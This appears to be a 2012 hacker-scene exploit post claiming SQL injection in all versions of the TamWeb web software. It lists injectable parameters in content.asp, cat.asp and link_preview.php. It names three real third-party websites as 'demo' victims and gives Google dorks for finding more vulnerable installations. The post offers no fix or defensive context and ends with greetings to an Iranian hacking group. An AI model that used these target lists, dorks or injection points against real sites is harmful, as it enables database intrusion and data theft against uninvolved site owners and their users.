TamWeb suffers from a remote SQL injection vulnerability.
011fd04e6063ea16d2bd2938205d4f0fa4b6d50ef1d83fbcf1ad329946358d61
**************************************************************************************************
| @@@@@@@@ @@@@@@@@@ @@ @@ @@@@@ @@ @@ @@@@@@@@ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ |
| @@@@@@@@ @@@ @@@ @ @ @ @ @ @ @ @ @ @@@@@@@@ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ |
| @@@@@@@@ @ @ @ @ @ @@@@@ @ @ @ @@@ @@@@@@@@ |
**************************************************************************************************
==================================================================================================
# [~] Exploit Title: TamWeb SQL Injection Bugs #
# [~] Google Dorks : " Bottom Of The Exploits " #
# [~] Date: 09/09/2012 (Su) #
# [~] Exploit Author: Samim.s #
# [~] Version: ALL Versions #
# [~] Tested on: Se7en & BT5 #
# [~] Support WebSite : TamWeb.ir #
==================================================================================================
# [+] SQLi Exploits : #
# http://WebSite.Com/[path]/content.asp?type=[SQLi] #
# http://WebSite.Com/[path]/cat.asp?cat_id=[SQLi] #
# http://WebSite.Com/[path]/link_preview.php?page_id=[SQLi] #
# ---------------------------------------------------------------------------------------------- #
# [+] Demos : #
# http://www.tavanir.org.ir/link_preview.php?page_id=[SQLi] #
# http://www.dr-shadabi.ir/cat.asp?cat_id=[SQLi] #
# http://www.aria-atsez.com/content.asp?type=[SQLi] #
# ---------------------------------------------------------------------------------------------- #
# [+] Dorks : #
# inurl:"content.asp?type=" #
# inurl:"cat.asp?cat_id=" #
# inurl:"link_preview.php?page_id=" #
==================================================================================================
# [*] GreetZ To: Mr.XpR - UnknowN - Mr.EBI - SaMaN.BiLiZ & All IRaNHaCK Member + Iranian HaCkerZ #
==================================================================================================